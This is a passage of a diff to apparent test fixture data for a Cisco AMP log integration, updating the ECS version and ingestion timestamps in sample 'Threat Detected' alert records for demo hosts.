Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -340,7 +340,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -366,7 +366,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581733039Z", + "ingested": "2021-09-13T18:06:53.271898088Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -423,7 +423,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -449,7 +449,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581734917Z", + "ingested": "2021-09-13T18:06:53.271900010Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -506,7 +506,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -532,7 +532,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581736759Z", + "ingested": "2021-09-13T18:06:53.271901953Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -589,7 +589,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -615,7 +615,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581738562Z", + "ingested": "2021-09-13T18:06:53.271903942Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -672,7 +672,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -698,7 +698,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581740367Z", + "ingested": "2021-09-13T18:06:53.271905830Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -755,7 +755,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -781,7 +781,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581742294Z", + "ingested": "2021-09-13T18:06:53.271907735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -838,7 +838,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -864,7 +864,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581744207Z", + "ingested": "2021-09-13T18:06:53.271909623Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -921,7 +921,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -947,7 +947,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581746351Z", + "ingested": "2021-09-13T18:06:53.271911811Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1004,7 +1004,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1030,7 +1030,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581748237Z", + "ingested": "2021-09-13T18:06:53.271913736Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1087,7 +1087,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1113,7 +1113,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581750120Z", + "ingested": "2021-09-13T18:06:53.271915654Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1170,7 +1170,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1196,7 +1196,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581752005Z", + "ingested": "2021-09-13T18:06:53.271917544Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1253,7 +1253,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1279,7 +1279,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581753905Z", + "ingested": "2021-09-13T18:06:53.271919448Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1336,7 +1336,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1362,7 +1362,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581755886Z", + "ingested": "2021-09-13T18:06:53.271921422Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1419,7 +1419,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1441,7 +1441,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581757773Z", + "ingested": "2021-09-13T18:06:53.271923288Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1498,7 +1498,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1524,7 +1524,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581759663Z", + "ingested": "2021-09-13T18:06:53.271925171Z", "original": 